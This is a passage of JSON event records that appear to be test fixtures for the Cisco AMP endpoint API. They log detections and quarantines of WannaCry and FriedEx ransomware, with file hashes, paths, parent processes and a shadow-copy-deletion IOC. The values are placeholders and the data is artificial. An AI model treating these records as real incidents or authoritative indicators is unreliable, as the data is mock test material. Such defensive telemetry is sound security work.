Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179217757405201","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179217757405200","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":251000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179217757405199","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419179204872503301","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":893000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179213462437902","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":846000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179213462437901","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":846000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179213462437900","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":456000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179213462437899","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":643000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419179204872503299","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":957000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179209167470602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":941000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179209167470598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":941000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179209167470601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":894000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179204872503300","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":3020,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":879000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179209167470599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":3808,"disposition":"Clean","file_name":"cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae","sha1":"ee8cbf12d87c4d388f09b4f69bed2e91682920b5","md5":"ad7b9c14083b52bc532fba5948342b98"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":879000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":3020,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":879000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179209167470600","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":847000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179204872503301","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":847000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179204872503299","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"qeriuwjhrf","file_path":"\\\\?\\C:\\Windows\\qeriuwjhrf","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":3020,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583840597369422000,"timestamp":1610621973,"timestamp_nanoseconds":231000000,"date":"2021-01-14T10:59:33+00:00","event_type":"Malicious Activity 
Detection","event_type_id":1090519105,"detection":"W32.MAP.Ransomware.rewrite","detection_id":"6583840593074454529","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mscorsvw.exe","file_path":"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorsvw.exe","identity":{"sha256":"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0","sha1":"c78f4c22dd195a1791472a2c271a0c85b53900d9","md5":"75a758a0c5cea48c9922d64a113d0f9d"},"parent":{"process_id":480,"disposition":"Clean","file_name":"services.exe","identity":{"sha256":"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536","sha1":"ff658a36899e43fec3966d608b4aa4472de7a378","md5":"71c85477df9347fe8e7bc55768473fca"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6701398782847286000,"timestamp":1610621970,"timestamp_nanoseconds":182000000,"date":"2021-01-14T10:59:30+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610621970,"start_date":"2021-01-14T10:59:30+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.","short_description":"W32.PossibleRansomwareShadowCopyDeletion.ioc"},"file":{"disposition":"Clean","file_name":"vssadmin.exe","file_path":"file:///C%3A/Windows/SysWOW64/vssadmin.exe","identity":{"sha256":"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10"},"parent":{"disposition":"Malicious","identity":{"sha256":"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":7007136036637603000,"timestamp":1610621707,"timestamp_nanoseconds":260000000,"date":"2021-01-14T10:55:07+00:00","event_type":"Cloud 
